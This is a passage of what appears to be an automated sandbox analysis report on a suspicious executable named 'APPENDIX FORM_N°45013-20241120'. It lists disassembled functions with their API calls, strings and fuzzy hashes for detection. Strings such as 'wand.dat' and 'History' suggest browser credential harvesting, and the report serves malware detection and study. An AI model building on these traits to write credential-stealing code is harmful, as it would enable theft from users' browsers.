                                                                                                              • API String ID: 102104167-2245444037
                                                                                                              • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                              • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                              Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 613200358-0
                                                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                              Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                              • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MetricsSystem$PlacementWindow
                                                                                                              • String ID: AE
                                                                                                              • API String ID: 3548547718-685266089
                                                                                                              • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                              • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                              • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                              • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                              Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memicmpwcslen
                                                                                                              • String ID: @@@@$History
                                                                                                              • API String ID: 1872909662-685208920
                                                                                                              • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                              • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                              Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004100FB
                                                                                                              • memset.MSVCRT ref: 00410112
                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                              • String ID: </%s>
                                                                                                              • API String ID: 3400436232-259020660
                                                                                                              • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                              • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                              Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040E770
                                                                                                              • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendmemset
                                                                                                              • String ID: AE$"
                                                                                                              • API String ID: 568519121-1989281832
                                                                                                              • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                              • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                              Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040D58D
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                              • String ID: caption
                                                                                                              • API String ID: 1523050162-4135340389
                                                                                                              • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                              • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                              Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                              • String ID: MS Sans Serif
                                                                                                              • API String ID: 210187428-168460110
                                                                                                              • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                              • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                              Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassName_wcsicmpmemset
                                                                                                              • String ID: edit
                                                                                                              • API String ID: 2747424523-2167791130
                                                                                                              • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                              • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                              Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                                              • API String ID: 3150196962-1506664499
                                                                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                              Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 3384217055-0
                                                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                              Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$memcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 368790112-0
                                                                                                              • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                              • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                              Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                              • String ID:
                                                                                                              • API String ID: 1889144086-0
                                                                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                              Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                              • String ID:
                                                                                                              • API String ID: 1661045500-0
                                                                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                              Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                              Strings
                                                                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                              • API String ID: 1297977491-2063813899
                                                                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                              Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040560C
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                              • String ID: *.*$dat$wand.dat
                                                                                                              • API String ID: 2618321458-1828844352
                                                                                                              • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                              • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                              Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
